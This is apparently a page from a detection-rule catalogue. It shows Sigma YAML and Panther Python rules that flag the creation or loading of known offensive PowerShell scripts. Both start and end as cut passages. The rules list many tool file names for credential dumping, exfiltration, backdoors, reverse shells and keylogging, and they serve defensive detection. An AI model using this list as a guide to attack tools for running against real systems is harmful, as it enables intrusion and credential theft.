                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-BetterSafetyKatz.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-BruteForce.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-BypassUAC.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Carbuncle.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Certify.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-ConPtyShell.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-CredentialInjection.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-CredentialsPhish.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-DAFT.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-DCSync.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Decode.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-DinvokeKatz.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-DllInjection.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-DNSExfiltrator.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-DNSUpdate.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-DowngradeAccount.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-EgressCheck.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Encode.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-EventViewer.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-Eyewitness.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-FakeLogonScreen.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Farmer.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-Get-RBCD-Threaded.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Gopher.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Grouper2.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Grouper3.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-HandleKatz.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-Interceptor.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-Internalmonologue.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Inveigh.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-InveighRelay.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-JSRatRegsvr.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-JSRatRundll.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-KrbRelay.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-KrbRelayUp.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-LdapSignCheck.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Lockless.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-MalSCCM.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Mimikatz.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-MimikatzWDigestDowngrade.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-Mimikittenz.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-MITM6.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-NanoDump.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-NetRipper.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-NetworkRelay.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-NinjaCopy.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-OxidResolver.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-P0wnedshell.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-P0wnedshellx86.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Paranoia.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-PortScan.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PoshRatHttp.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PoshRatHttps.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-PostExfil.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-PowerDump.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerDPAPI.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerShellIcmp.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerShellTCP.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerShellTcpOneLine.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerShellTcpOneLineBind.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerShellUdp.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerShellUdpOneLine.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerShellWMI.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerThIEf.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-PPLDump.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Prasadhak.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-PsExec.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-PsGcat.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PsGcatAgent.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-PSInject.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-PsUaCme.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-ReflectivePEInjection.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-ReverseDNSLookup.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Rubeus.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-RunAs.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-SafetyKatz.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-SauronEye.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-SCShell.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Seatbelt.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-ServiceAbuse.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-SessionGopher.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-ShellCode.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-SMBScanner.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Snaffler.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-Spoolsample.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-SSHCommand.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-SSIDExfil.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-StandIn.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-StickyNotesExtract.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Tater.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-Thunderfox.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-ThunderStruck.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-TokenManipulation.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-Tokenvator.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-TotalExec.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-UrbanBishop.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-UserHunter.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-VoiceTroll.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Whisker.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-WinEnum.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-winPEAS.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-WireTap.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-WmiCommand.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-WScriptBypassUAC.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Zerologon.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Keylogger.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\MailRaider.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\New-HoneyHash.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\OfficeMemScraper.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Offline_Winpwn.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-CHM.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-DnsTxt.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-Excel.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-HTA.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-Java.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-JS.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-Minidump.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Out-RundllCommand.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-SCF.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-SCT.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-Shortcut.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-WebQuery.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-Word.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Parse_Keys.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Port-Scan.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\PowerBreach.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\powercat.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Powermad.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\PowerRunAsSystem.psm1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\PowerSharpPack.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\PowerUp.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\PowerUpSQL.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\PowerView.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\PSAsyncShell.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\RemoteHashRetrieval.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Remove-Persistence.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Remove-PoshRat.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Remove-Update.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Run-EXEonRemote.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Schtasks-Backdoor.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Set-DCShadowPermissions.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Set-MacAttribute.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Set-RemotePSRemoting.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Set-RemoteWMI.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Set-Wallpaper.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Show-TargetScreen.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Speak.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Start-CaptureServer.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Start-WebcamRecorder.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\StringToBase64.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\TexttoExe.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Veeam-Get-Creds.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\VolumeShadowCopyTools.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\WinPwn.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\WSUSpendu.ps1"),
                ]
            ),
            all(
                [
                    "Invoke-Sharp" in event.deep_get("TargetFilename", default=""),
                    event.deep_get("TargetFilename", default="").endswith(".ps1"),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Malicious PowerShell Scripts - FileCreation
id: f331aa1f-8c53-4fc3-b083-cc159bc971cb
related:
    - id: 41025fd7-0466-4650-a813-574aaacbe7f4
      type: similar
status: test
description: Detects the creation of known offensive powershell scripts used for exploitation
references:
    - https://github.com/PowerShellMafia/PowerSploit
    - https://github.com/NetSPI/PowerUpSQL
    - https://github.com/CsEnox/EventViewer-UACBypass
    - https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu
    - https://github.com/nettitude/Invoke-PowerThIEf
    - https://github.com/S3cur3Th1sSh1t/WinPwn
    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1
    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1
    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1
    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1
    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec
    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec
    - https://github.com/HarmJ0y/DAMP
    - https://github.com/samratashok/nishang
    - https://github.com/DarkCoderSc/PowerRunAsSystem/
    - https://github.com/besimorhino/powercat
    - https://github.com/Kevin-Robertson/Powermad
    - https://github.com/adrecon/ADRecon
    - https://github.com/adrecon/AzureADRecon
    - https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1
    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/
    - https://github.com/Arno0x/DNSExfiltrator/
author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein
date: 2018-04-07
modified: 2025-12-10
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: file_event
    product: windows
detection:
    selection_generic:
        TargetFilename|endswith:
            # Note: Please ensure alphabetical order when adding new entries
            - '\Add-ConstrainedDelegationBackdoor.ps1'
            - '\Add-Exfiltration.ps1'
            - '\Add-Persistence.ps1'
            - '\Add-RegBackdoor.ps1'
            - '\Add-RemoteRegBackdoor.ps1'
            - '\Add-ScrnSaveBackdoor.ps1'
            - '\ADRecon.ps1'
            - '\AzureADRecon.ps1'
            - '\BadSuccessor.ps1'
            - '\Check-VM.ps1'
            - '\ConvertTo-ROT13.ps1'
            - '\Copy-VSS.ps1'
            - '\Create-MultipleSessions.ps1'
            - '\DNS_TXT_Pwnage.ps1'
            - '\dnscat2.ps1'
            - '\Do-Exfiltration.ps1'
            - '\DomainPasswordSpray.ps1'
            - '\Download_Execute.ps1'
            - '\Download-Execute-PS.ps1'
            - '\Enable-DuplicateToken.ps1'
            - '\Enabled-DuplicateToken.ps1'
            - '\Execute-Command-MSSQL.ps1'
            - '\Execute-DNSTXT-Code.ps1'
            - '\Execute-OnTime.ps1'
            - '\ExetoText.ps1'
            - '\Exploit-Jboss.ps1'
            - '\Find-AVSignature.ps1'
            - '\Find-Fruit.ps1'
            - '\Find-GPOLocation.ps1'
            - '\Find-TrustedDocuments.ps1'
            - '\FireBuster.ps1'
            - '\FireListener.ps1'
            - '\Get-ApplicationHost.ps1'
            - '\Get-ChromeDump.ps1'
            - '\Get-ClipboardContents.ps1'
            - '\Get-ComputerDetail.ps1'
            - '\Get-FoxDump.ps1'
            - '\Get-GPPAutologon.ps1'
            - '\Get-GPPPassword.ps1'
            - '\Get-IndexedItem.ps1'
            - '\Get-Keystrokes.ps1'
            - '\Get-LSASecret.ps1'
            - '\Get-MicrophoneAudio.ps1'
            - '\Get-PassHashes.ps1'
            - '\Get-PassHints.ps1'
            - '\Get-RegAlwaysInstallElevated.ps1'
            - '\Get-RegAutoLogon.ps1'
            - '\Get-RickAstley.ps1'
            - '\Get-Screenshot.ps1'
            - '\Get-SecurityPackages.ps1'
            - '\Get-ServiceFilePermission.ps1'
            - '\Get-ServicePermission.ps1'
            - '\Get-ServiceUnquoted.ps1'
            - '\Get-SiteListPassword.ps1'
            - '\Get-System.ps1'
            - '\Get-TimedScreenshot.ps1'
            - '\Get-UnattendedInstallFile.ps1'
            - '\Get-Unconstrained.ps1'
            - '\Get-USBKeystrokes.ps1'
            - '\Get-VaultCredential.ps1'
            - '\Get-VulnAutoRun.ps1'
            - '\Get-VulnSchTask.ps1'
            - '\Get-WebConfig.ps1'
            - '\Get-WebCredentials.ps1'
            - '\Get-WLAN-Keys.ps1'
            - '\Gupt-Backdoor.ps1'
            - '\HTTP-Backdoor.ps1'
            - '\HTTP-Login.ps1'
            - '\Install-ServiceBinary.ps1'
            - '\Install-SSP.ps1'
            - '\Invoke-ACLScanner.ps1'
            - '\Invoke-ADSBackdoor.ps1'
            - '\Invoke-AmsiBypass.ps1'
            - '\Invoke-ARPScan.ps1'
            - '\Invoke-BackdoorLNK.ps1'
            - '\Invoke-BadPotato.ps1'
            - '\Invoke-BetterSafetyKatz.ps1'
            - '\Invoke-BruteForce.ps1'
            - '\Invoke-BypassUAC.ps1'
            - '\Invoke-Carbuncle.ps1'
            - '\Invoke-Certify.ps1'
            - '\Invoke-ConPtyShell.ps1'
            - '\Invoke-CredentialInjection.ps1'
            - '\Invoke-CredentialsPhish.ps1'
            - '\Invoke-DAFT.ps1'
            - '\Invoke-DCSync.ps1'
            - '\Invoke-Decode.ps1'
            - '\Invoke-DinvokeKatz.ps1'
            - '\Invoke-DllInjection.ps1'
            - '\Invoke-DNSExfiltrator.ps1'
            - '\Invoke-DNSUpdate.ps1'
            - '\Invoke-DowngradeAccount.ps1'
            - '\Invoke-EgressCheck.ps1'
            - '\Invoke-Encode.ps1'
            - '\Invoke-EventViewer.ps1'
            - '\Invoke-Eyewitness.ps1'
            - '\Invoke-FakeLogonScreen.ps1'
            - '\Invoke-Farmer.ps1'
            - '\Invoke-Get-RBCD-Threaded.ps1'
            - '\Invoke-Gopher.ps1'
            - '\Invoke-Grouper2.ps1'
            - '\Invoke-Grouper3.ps1'
            - '\Invoke-HandleKatz.ps1'
            - '\Invoke-Interceptor.ps1'
            - '\Invoke-Internalmonologue.ps1'
            - '\Invoke-Inveigh.ps1'
            - '\Invoke-InveighRelay.ps1'
            - '\Invoke-JSRatRegsvr.ps1'
            - '\Invoke-JSRatRundll.ps1'
            - '\Invoke-KrbRelay.ps1'
            - '\Invoke-KrbRelayUp.ps1'
            - '\Invoke-LdapSignCheck.ps1'
            - '\Invoke-Lockless.ps1'
            - '\Invoke-MalSCCM.ps1'
            - '\Invoke-Mimikatz.ps1'
            - '\Invoke-MimikatzWDigestDowngrade.ps1'
            - '\Invoke-Mimikittenz.ps1'
            - '\Invoke-MITM6.ps1'
            - '\Invoke-NanoDump.ps1'
            - '\Invoke-NetRipper.ps1'
            - '\Invoke-NetworkRelay.ps1'
            - '\Invoke-NinjaCopy.ps1'
            - '\Invoke-OxidResolver.ps1'
            - '\Invoke-P0wnedshell.ps1'
            - '\Invoke-P0wnedshellx86.ps1'
            - '\Invoke-Paranoia.ps1'
            - '\Invoke-PortScan.ps1'
            - '\Invoke-PoshRatHttp.ps1'
            - '\Invoke-PoshRatHttps.ps1'
            - '\Invoke-PostExfil.ps1'
            - '\Invoke-PowerDump.ps1'
            - '\Invoke-PowerDPAPI.ps1'
            - '\Invoke-PowerShellIcmp.ps1'
            - '\Invoke-PowerShellTCP.ps1'
            - '\Invoke-PowerShellTcpOneLine.ps1'
            - '\Invoke-PowerShellTcpOneLineBind.ps1'
            - '\Invoke-PowerShellUdp.ps1'
            - '\Invoke-PowerShellUdpOneLine.ps1'
            - '\Invoke-PowerShellWMI.ps1'
            - '\Invoke-PowerThIEf.ps1'
            - '\Invoke-PPLDump.ps1'
            - '\Invoke-Prasadhak.ps1'
            - '\Invoke-PsExec.ps1'
            - '\Invoke-PsGcat.ps1'
            - '\Invoke-PsGcatAgent.ps1'
            - '\Invoke-PSInject.ps1'
            - '\Invoke-PsUaCme.ps1'
            - '\Invoke-ReflectivePEInjection.ps1'
            - '\Invoke-ReverseDNSLookup.ps1'
            - '\Invoke-Rubeus.ps1'
            - '\Invoke-RunAs.ps1'
            - '\Invoke-SafetyKatz.ps1'
            - '\Invoke-SauronEye.ps1'
            - '\Invoke-SCShell.ps1'
            - '\Invoke-Seatbelt.ps1'
            - '\Invoke-ServiceAbuse.ps1'
            - '\Invoke-SessionGopher.ps1'
            - '\Invoke-ShellCode.ps1'
            - '\Invoke-SMBScanner.ps1'
            - '\Invoke-Snaffler.ps1'
            - '\Invoke-Spoolsample.ps1'
            - '\Invoke-SSHCommand.ps1'
            - '\Invoke-SSIDExfil.ps1'
            - '\Invoke-StandIn.ps1'
            - '\Invoke-StickyNotesExtract.ps1'
            - '\Invoke-Tater.ps1'
            - '\Invoke-Thunderfox.ps1'
            - '\Invoke-ThunderStruck.ps1'
            - '\Invoke-TokenManipulation.ps1'
            - '\Invoke-Tokenvator.ps1'
            - '\Invoke-TotalExec.ps1'
            - '\Invoke-UrbanBishop.ps1'
            - '\Invoke-UserHunter.ps1'
            - '\Invoke-VoiceTroll.ps1'
            - '\Invoke-Whisker.ps1'
            - '\Invoke-WinEnum.ps1'
            - '\Invoke-winPEAS.ps1'
            - '\Invoke-WireTap.ps1'
            - '\Invoke-WmiCommand.ps1'
            - '\Invoke-WScriptBypassUAC.ps1'
            - '\Invoke-Zerologon.ps1'
            - '\Keylogger.ps1'
            - '\MailRaider.ps1'
            - '\New-HoneyHash.ps1'
            - '\OfficeMemScraper.ps1'
            - '\Offline_Winpwn.ps1'
            - '\Out-CHM.ps1'
            - '\Out-DnsTxt.ps1'
            - '\Out-Excel.ps1'
            - '\Out-HTA.ps1'
            - '\Out-Java.ps1'
            - '\Out-JS.ps1'
            - '\Out-Minidump.ps1'
            - '\Out-RundllCommand.ps1'
            - '\Out-SCF.ps1'
            - '\Out-SCT.ps1'
            - '\Out-Shortcut.ps1'
            - '\Out-WebQuery.ps1'
            - '\Out-Word.ps1'
            - '\Parse_Keys.ps1'
            - '\Port-Scan.ps1'
            - '\PowerBreach.ps1'
            - '\powercat.ps1'
            - '\Powermad.ps1'
            - '\PowerRunAsSystem.psm1'
            - '\PowerSharpPack.ps1'
            - '\PowerUp.ps1'
            - '\PowerUpSQL.ps1'
            - '\PowerView.ps1'
            - '\PSAsyncShell.ps1'
            - '\RemoteHashRetrieval.ps1'
            - '\Remove-Persistence.ps1'
            - '\Remove-PoshRat.ps1'
            - '\Remove-Update.ps1'
            - '\Run-EXEonRemote.ps1'
            - '\Schtasks-Backdoor.ps1'
            - '\Set-DCShadowPermissions.ps1'
            - '\Set-MacAttribute.ps1'
            - '\Set-RemotePSRemoting.ps1'
            - '\Set-RemoteWMI.ps1'
            - '\Set-Wallpaper.ps1'
            - '\Show-TargetScreen.ps1'
            - '\Speak.ps1'
            - '\Start-CaptureServer.ps1'
            - '\Start-WebcamRecorder.ps1'
            - '\StringToBase64.ps1'
            - '\TexttoExe.ps1'
            - '\Veeam-Get-Creds.ps1'
            - '\VolumeShadowCopyTools.ps1'
            - '\WinPwn.ps1'
            - '\WSUSpendu.ps1'
    selection_invoke_sharp:
        TargetFilename|contains: 'Invoke-Sharp' # Covers all "Invoke-Sharp" variants
        TargetFilename|endswith: '.ps1'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Malicious PowerShell Scripts - PoshModule

Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance

status test author frack113, Nasreddine Bencherchali (Nextron Systems) id 41025fd7-0466-4650-a813-574aaacbe7f4

panther query

def rule(event):
    if any(
        [
            any(
                [
                    "Add-ConstrainedDelegationBackdoor.ps1"
                    in event.deep_get("ContextInfo", default=""),
                    "Add-Exfiltration.ps1" in event.deep_get("ContextInfo", default=""),
                    "Add-Persistence.ps1" in event.deep_get("ContextInfo", default=""),
                    "Add-RegBackdoor.ps1" in event.deep_get("ContextInfo", default=""),
                    "Add-RemoteRegBackdoor.ps1" in event.deep_get("ContextInfo", default=""),
                    "Add-ScrnSaveBackdoor.ps1" in event.deep_get("ContextInfo", default=""),
                    "BadSuccessor.ps1" in event.deep_get("ContextInfo", default=""),
                    "Check-VM.ps1" in event.deep_get("ContextInfo", default=""),
                    "ConvertTo-ROT13.ps1" in event.deep_get("ContextInfo", default=""),
                    "Copy-VSS.ps1" in event.deep_get("ContextInfo", default=""),
                    "Create-MultipleSessions.ps1" in event.deep_get("ContextInfo", default=""),
                    "DNS_TXT_Pwnage.ps1" in event.deep_get("ContextInfo", default=""),
                    "dnscat2.ps1" in event.deep_get("ContextInfo", default=""),
                    "Do-Exfiltration.ps1" in event.deep_get("ContextInfo", default=""),
                    "DomainPasswordSpray.ps1" in event.deep_get("ContextInfo", default=""),
                    "Download_Execute.ps1" in event.deep_get("ContextInfo", default=""),
                    "Download-Execute-PS.ps1" in event.deep_get("ContextInfo", default=""),
                    "Enabled-DuplicateToken.ps1" in event.deep_get("ContextInfo", default=""),
                    "Enable-DuplicateToken.ps1" in event.deep_get("ContextInfo", default=""),
                    "Execute-Command-MSSQL.ps1" in event.deep_get("ContextInfo", default=""),
                    "Execute-DNSTXT-Code.ps1" in event.deep_get("ContextInfo", default=""),
                    "Execute-OnTime.ps1" in event.deep_get("ContextInfo", default=""),
                    "ExetoText.ps1" in event.deep_get("ContextInfo", default=""),
                    "Exploit-Jboss.ps1" in event.deep_get("ContextInfo", default=""),
                    "Find-AVSignature.ps1" in event.deep_get("ContextInfo", default=""),
                    "Find-Fruit.ps1" in event.deep_get("ContextInfo", default=""),
                    "Find-GPOLocation.ps1" in event.deep_get("ContextInfo", default=""),
                    "Find-TrustedDocuments.ps1" in event.deep_get("ContextInfo", default=""),
                    "FireBuster.ps1" in event.deep_get("ContextInfo", default=""),
                    "FireListener.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-ApplicationHost.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-ChromeDump.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-ClipboardContents.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-ComputerDetail.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-FoxDump.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-GPPAutologon.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-GPPPassword.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-IndexedItem.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-Keystrokes.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-LSASecret.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-MicrophoneAudio.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-PassHashes.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-PassHints.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-RegAlwaysInstallElevated.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-RegAutoLogon.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-RickAstley.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-Screenshot.ps1" in event.deep_get("ContextInfo", default=""),
